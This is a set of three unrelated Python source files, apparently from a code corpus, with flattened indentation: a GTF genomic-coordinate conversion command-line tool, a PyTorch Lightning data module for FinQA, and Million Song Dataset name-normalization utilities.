# main parser with subparsers
parser = argparse.ArgumentParser(prog='GTFtools.py',
description='GTF file manipulation')
subparsers = parser.add_subparsers(title='GTF operations',
help='supported operations', dest='subcmd')
parser_txinfo = subparsers.add_parser('txinfo',
help='summary information of each transcript',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_tobed = subparsers.add_parser('convert2bed',
help='convert GTF to bed12 format', parents=[parent_parser],
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_tobed.add_argument('-t', '--type',
type=str, default='exon',
choices=['exon', 'cds', 'utr5', 'utr3'],
help='types of intervals to be converted to bed for each transcript')
parser_tobed.add_argument('-e', '--extend',
type=int, default=0,
help='number of bases to extend at both sides')
parser_t2g = subparsers.add_parser('t2g',
help='convert tpos to gpos', parents=[parent_parser],
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_t2g.add_argument('-i', '--infile', type = str,
help='tab-delimited file with the first two columns composed of'
'tx_id and transcript coordinates')
parser_g2t = subparsers.add_parser('g2t',
help='convert gpos to tpos', parents=[parent_parser],
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_g2t.add_argument('-i', '--infile', type = str,
help='tab-delimited file with the first two columns composed of '
'tx_id and genomic coordinates')
parser_tiv2giv = subparsers.add_parser('tiv2giv',
help='convert tiv to giv', parents=[parent_parser],
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_tiv2giv.add_argument('-i', '--infile', type = str,
help='tab-delimited file with the first three columns composed of '
'tx_id, start and end coordinates')
parser_giv2tiv = subparsers.add_parser('giv2tiv',
help='convert giv to tiv', parents=[parent_parser],
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser_giv2tiv.add_argument('-i', '--infile', type = str,
help='tab-delimited file with the first three columns composed of '
'tx_id, start and end coordinates')
args = parser.parse_args()
if args.subcmd == 'convert2bed':
if args.type == 'exon':
exon_to_bed(args.gtf, args.extend)
elif args.type == 'cds':
cds_to_bed(args.gtf, args.extend)
elif args.type == 'utr5':
utr5_to_bed(args.gtf, args.extend)
else:
utr3_to_bed(args.gtf, args.extend)
elif args.subcmd == 'txinfo':
tx_info(args.gtf)
elif args.subcmd == 't2g':
t2g(gtf=args.gtf, tfile=args.infile)
elif args.subcmd == 'g2t':
g2t(gtf=args.gtf, gfile=args.infile)
elif args.subcmd == 'tiv2giv':
tiv2giv(gtf=args.gtf, tivfile=args.infile)
elif args.subcmd == 'giv2tiv':
giv2tiv(gtf=args.gtf, givfile=args.infile)
|
import json
import logging
import sys
import os
import torch
from typing import Dict, Iterable, List, Any, Optional, Union
from pytorch_lightning import LightningDataModule
from torch.utils.data import Dataset
from lightning_modules.models.seq2seq_model_util import get_model, left_pad_sequences
from transformers import BertTokenizer, RobertaTokenizer
import program_generation_utils
from program_generation_utils import *
from utils import *
from torch.utils.data import DataLoader
os.environ['TOKENIZERS_PARALLELISM']='0'
op_list_file = "/home/lily/yz979/code/LogicNLG_2/retriever/operation_list.txt"
log_file = "log.txt"
const_list_file = "/home/lily/yz979/code/LogicNLG_2/retriever/constant_list.txt"
op_list = read_txt(op_list_file, log_file)
op_list = [op + '(' for op in op_list]
op_list = ['EOF', 'UNK', 'GO', ')'] + op_list
const_list = read_txt(const_list_file, log_file)
const_list = [const.lower().replace('.', '_') for const in const_list]
reserved_token_size = len(op_list) + len(const_list)
valid_file = "dataset/data/val.json"
class FinQADataset(Dataset):
def __init__(
self,
model_name: str,
file_path: str,
max_seq_length: int,
max_program_length: int,
max_instances: int,
mode: str = "train",
**kwargs):
super().__init__(**kwargs)
assert mode in ["train", "test", "valid"]
self.max_seq_length = max_seq_length
self.max_program_length = max_program_length
if model_name.startswith("bert"):
self.tokenizer = BertTokenizer.from_pretrained(model_name)
elif model_name.startswith("roberta"):
self.tokenizer = RobertaTokenizer.from_pretrained(model_name)
self.max_instances = max_instances
self.mode = mode
self.instances = self.read(file_path, self.tokenizer)
def read(self, input_path: str, tokenizer) -> Iterable[Dict[str, Any]]:
with open(input_path) as input_file:
input_data = json.load(input_file)[:self.max_instances]
examples = []
for entry in input_data:
example = program_generation_utils.read_mathqa_entry(entry, tokenizer)
if example:
examples.append(example)
kwargs = {
"examples": examples,
"tokenizer": tokenizer,
"max_seq_length": self.max_seq_length,
"max_program_length": self.max_program_length,
"is_training": True,
"op_list": op_list,
"op_list_size": len(op_list),
"const_list": const_list,
"const_list_size": len(const_list),
"verbose": True
}
if self.mode != "train":
kwargs["is_training"] = False
data = convert_examples_to_features(**kwargs)
return data
def __getitem__(self, idx: int):
return self.instances[idx]
def __len__(self):
return len(self.instances)
def truncate(self, max_instances):
truncated_instances = self.instances[max_instances:]
self.instances = self.instances[:max_instances]
return truncated_instances
def extend(self, instances):
self.instances.extend(instances)
def customized_collate_fn(examples: List) -> Dict[str, Any]:
result_dict = {}
for k in examples[0].keys():
try:
result_dict[k] = left_pad_sequences([torch.tensor(ex[k]) for ex in examples],
batch_first=True, padding_value=0)
except:
result_dict[k] = [ex[k] for ex in examples]
return result_dict
class FinQADataModule(LightningDataModule):
def __init__(self,
model_name: str,
max_seq_length: int,
max_program_length: int,
batch_size: int = 1,
val_batch_size: int = 1,
train_file_path: str = None,
val_file_path: str = None,
test_file_path: str = None,
train_max_instances: int = sys.maxsize,
val_max_instances: int = sys.maxsize):
super().__init__()
self.model_name = model_name
self.max_seq_length = max_seq_length
self.max_program_length = max_program_length
self.batch_size = batch_size
self.val_batch_size = val_batch_size
self.train_file_path = train_file_path
self.val_file_path = val_file_path
self.test_file_path = test_file_path
self.train_max_instances = train_max_instances
self.val_max_instances = val_max_instances
self.train_data = None
self.val_data = None
# OPTIONAL, called for every GPU/machine (assigning state is OK)
def setup(self, stage: Optional[str] = None):
assert stage in ["fit", "validate", "test"]
train_data = FinQADataset(model_name=self.model_name,
file_path=self.train_file_path,
max_seq_length = self.max_seq_length,
max_program_length = self.max_program_length,
max_instances = self.train_max_instances,
mode = "train")
self.train_data = train_data
val_data = FinQADataset(model_name=self.model_name,
file_path=self.val_file_path,
max_seq_length = self.max_seq_length,
max_program_length = self.max_program_length,
max_instances=self.val_max_instances,
mode="valid")
self.val_data = val_data
test_data = FinQADataset(model_name=self.model_name,
file_path=self.test_file_path,
max_seq_length = self.max_seq_length,
max_program_length = self.max_program_length,
max_instances=self.val_max_instances,
mode="test")
self.test_data = test_data
def train_dataloader(self):
if self.train_data is None:
self.setup(stage="fit")
dtloader = DataLoader(self.train_data, batch_size=self.batch_size, shuffle=True, drop_last=True, collate_fn=customized_collate_fn)
return dtloader
def val_dataloader(self):
if self.val_data is None:
self.setup(stage="validate")
dtloader = DataLoader(self.val_data, batch_size=self.val_batch_size, shuffle=False, drop_last=False, collate_fn=customized_collate_fn)
return dtloader
def test_dataloader(self):
if self.test_data is None:
self.setup(stage="test")
dtloader = DataLoader(self.test_data, batch_size=self.val_batch_size, shuffle=False, drop_last=False, collate_fn=customized_collate_fn)
return dtloader |
"""
<NAME> (2011) Columbia University
<EMAIL>
This code contains functions to normalize an artist name,
and possibly a song title.
This is intended to do metadata matching.
It is mostly an elaborate hack, I never did an extensive search of
all problematic name matches.
Code developed using Python 2.6 on a Ubuntu machine, using UTF-8
This is part of the Million Song Dataset project from
LabROSA (Columbia University) and The Echo Nest.
Copyright 2011, <NAME>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import os
import re
import sys
import unicodedata
import itertools
import Levenshtein # http://pypi.python.org/pypi/python-Levenshtein/
# ROTATION SYMBOLS (A and B => B and A)
rotation_symbols = ['\|', '/', '&', ',', '\+', ';', '_']#, '\-']
rotation_words = ['and', 'y', 'et', 'vs', 'vs.', 'v', 'with', 'feat',
'feat.', 'featuring', 'presents', 'ft.', 'pres.']
# SYMBOLS TO REMOVE AT THE BEGINNING
stub_to_remove = ['dj', 'dj.', 'mc', 'm.c.', 'mc.', 'the', 'los', 'les']
# SYMBOLS TO REMOVE AT THE END
end_to_remove1 = ['big band', 'trio', 'quartet', 'ensemble', 'orchestra']
end_to_remove2 = ['band']
# COMPILED REGULAR EXPRESSION
# white spaces
re_space = re.compile(r'\s')
# non alphanumeric
re_nonalphanum = re.compile(r'\W')
# rotation symbols
re_rotsymbols = re.compile('\s*?' + '|'.join(rotation_symbols) + '\s*?')
# rotation words
re_rotwords = re.compile(r'\s(' + '|'.join(rotation_words) + ')\s')
# stub to remove
re_remstub = re.compile('(' + '|'.join(stub_to_remove) + ')\s(.*)')
# ending to remove
re_remending1 = re.compile('(.*)\s(' + '|'.join(end_to_remove1) + ')')
re_remending2 = re.compile('(.*)\s(' + '|'.join(end_to_remove2) + ')')
# quotes to remove
re_remquotes = re.compile('(.+)\s(".+?")\s(.+)')
# parenthesis to remove
re_remparenthesis = re.compile('(.+)\s(\(.+?\))\s*(.*)')
# brackets to remove
re_rembrackets = re.compile('(.+)\s(\[.+?\])\s*(.*)')
def char_is_ascii(c):
"""
Check if a unicode character, e.g. u'A', u'1' or u'\u0301' is ASCII
"""
#return ord(c) < 128
# the following should be faster, according to:
#http://stackoverflow.com/questions/196345/how-to-check-if-a-string-in-python-is-in-ascii
return c < u"\x7F"
def remove_non_ascii(s):
"""
Normalize characters in unicode string 's' that are not ASCII,
try to transform accented characters to non accented version.
Otherwise, remove non-ascii chars
"""
decomposition = unicodedata.normalize('NFKD', s)
return filter(lambda x: char_is_ascii(x), decomposition)
def to_lower_case(s):
"""
transform a unicode string 's' to lowercase
ok, this one is trivial, I know
"""
return s.lower()
def remove_spaces(s):
"""
Remove all possible spaces in the unicode string s
"""
return re_space.sub('', s)
def replace_rotation_symbols(s):
"""
Mostly, replace '&' by 'and'
"""
return re_rotsymbols.sub(' and ', s)
def remove_stub(s):
"""
Remove a questionable beginning, e.g. dj
otherwise return string at is
"""
m = re_remstub.match(s)
if not m:
return s
return m.groups()[1]
def remove_endings(s):
"""
Remove questionable endings, e.g. 'band'
"""
m = re_remending1.match(s)
if m:
s = m.groups()[0]
m = re_remending2.match(s)
if m:
s = m.groups()[0]
return s
def remove_quotes(s):
"""
Remove the quote, like Thierry "The Awesomest" BM
"""
m = re_remquotes.match(s)
if not m:
return s
parts = m.groups()
assert len(parts) == 3
return parts[0] + ' ' + parts[2]
def remove_parenthesis(s):
"""
Remove parenthesis, like Thierry (Coolest guy)
"""
m = re_remparenthesis.match(s)
if not m:
return s
parts = m.groups()
assert len(parts) >= 2
if len(parts) == 2:
return parts[0]
return parts[0] + ' ' + parts[2]
def remove_brackets(s):
"""
Remove brackets, like Thierry [Coolest guy]
"""
m = re_rembrackets.match(s)
if not m:
return s
parts = m.groups()
assert len(parts) >= 2
if len(parts) == 2:
return parts[0]
return parts[0] + ' ' + parts[2]
def normalize_no_rotation(s):
"""
We normalize a name that is supposed to contain no
rotation term ('and', 'y', ...)
"""
# remove beginning
s = remove_stub(s)
# remove ends
s = remove_endings(s)
# remove ()
s = remove_parenthesis(s)
# remove ""
s = remove_quotes(s)
return s
def split_rotation_words(s):
"""
Split a name using the rotation words: 'and', 'vs', 'y', 'et', ...
then create all possible permutations
"""
parts = re_rotwords.split(s)
parts = filter(lambda p: not p in rotation_words, parts)[:5]
results = set()
# keep only the individual elems (risky?)
for p in parts:
results.add(p)
# create all permutations
permutations = itertools.permutations(parts)
#maxperm = 30
#count_perm = 0
for perm in permutations:
#count_perm += 1
#if count_perm > maxperm:
# break
results.add(' '.join(perm))
# redo the same but remove the stub first for all parts
parts = map(lambda p: normalize_no_rotation(p), parts)
for p in parts:
results.add(p)
permutations = itertools.permutations(parts)
for perm in permutations:
results.add(' '.join(perm))
# done
return results
def remove_nonalphanumeric(s):
"""
Remove usual punctuation signs: ! , ? : ; . ' etc
Also, we transform long spaces into normal ones
"""
# split around non-alphanum chars
parts = re_nonalphanum.split(s)
# remove empty spots
parts = filter(lambda p: p, parts)
# rejoin with regular space ' '
return ' '.join(parts)
def normalize_artist(s):
"""
Return a set of normalized versions of that artist name
"""
# normalized versions
results = set()
# lower case
s = to_lower_case(s)
results.add(s)
# remove non-ascii chars (try to replace them)
s = remove_non_ascii(s)
results.add(s)
# try removing parenthesis before, in case there's an & in it
s2 = remove_parenthesis(s)
results.add(s2)
# replace rotation symbols
s = replace_rotation_symbols(s)
# split and permute according to rotation words
permutations = split_rotation_words(s)
results.update(permutations)
# remove non-alphanumeric and normalize spaces
results = map(lambda s: remove_nonalphanumeric(s), results)
# remove all spaces
results = map(lambda s: remove_spaces(s), results)
# done (and remove dupes)
return set(results)
def normalize_title(s):
"""
Return a set of normalized versions of that title
"""
# normalized versions
results = set()
# lower case
s = to_lower_case(s)
results.add(s)
# remove non-ascii chars (try to replace them)
s = remove_non_ascii(s)
results.add(s)
# try removing parenthesis
s = remove_parenthesis(s)
results.add(s)
# try removing brackets
s = remove_brackets(s)
results.add(s)
# remove non-alphanumeric and normalize spaces
results = map(lambda s: remove_nonalphanumeric(s), results)
# remove all spaces
results = map(lambda s: remove_spaces(s), results)
# done (and remove dupes)
return set(results)
def same_artist(name1, name2):
"""
Compare two artists:
- edit distance
- if one name is contained in the other
- by normalizing the names
Return True if it's the same artist, False otherwise
"""
# trivial
n1 = to_lower_case(name1)
n2 = to_lower_case(name2)
if n1 == n2:
return True
# edit distance
if len(n1) >= 10 or len(n2) >= 10:
if Levenshtein.distance(n1, n2) <= 2:
return True
# n1 contains n2? or the other way around
if len(n1) >= 10 and len(n2) >= 10:
if len(n1) > len(n2):
if n1.find(n2) >= 0:
return True
else:
if n2.find(n1) >= 0:
return True
# compare by normalizing names
normalized1 = normalize_artist(n1)
normalized2 = normalize_artist(n2)
if len(normalized1.intersection(normalized2)) > 0:
return True
return False
def same_title(title1, title2):
"""
Compare two titles:
- edit distance
- if one name is contained in the other
- by normalizing the title
Return True if it's the same title, False otherwise
"""
# trivial
t1 = to_lower_case(title1)
t2 = to_lower_case(title2)
if t1 == t2:
return True
# edit distance
if len(t1) >= 10 or len(t2) >= 10:
if Levenshtein.distance(t1, t2) <= 2:
return True
# n1 contains n2? or the other way around
if len(t1) >= 10 and len(t2) >= 10:
if len(t1) > len(t2):
if t1.find(t2) >= 0:
return True
else:
if t2.find(t1) >= 0:
return True
# compare by normalizing names
normalized1 = normalize_title(t1)
normalized2 = normalize_title(t2)
if len(normalized1.intersection(normalized2)) > 0:
return True
return False
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.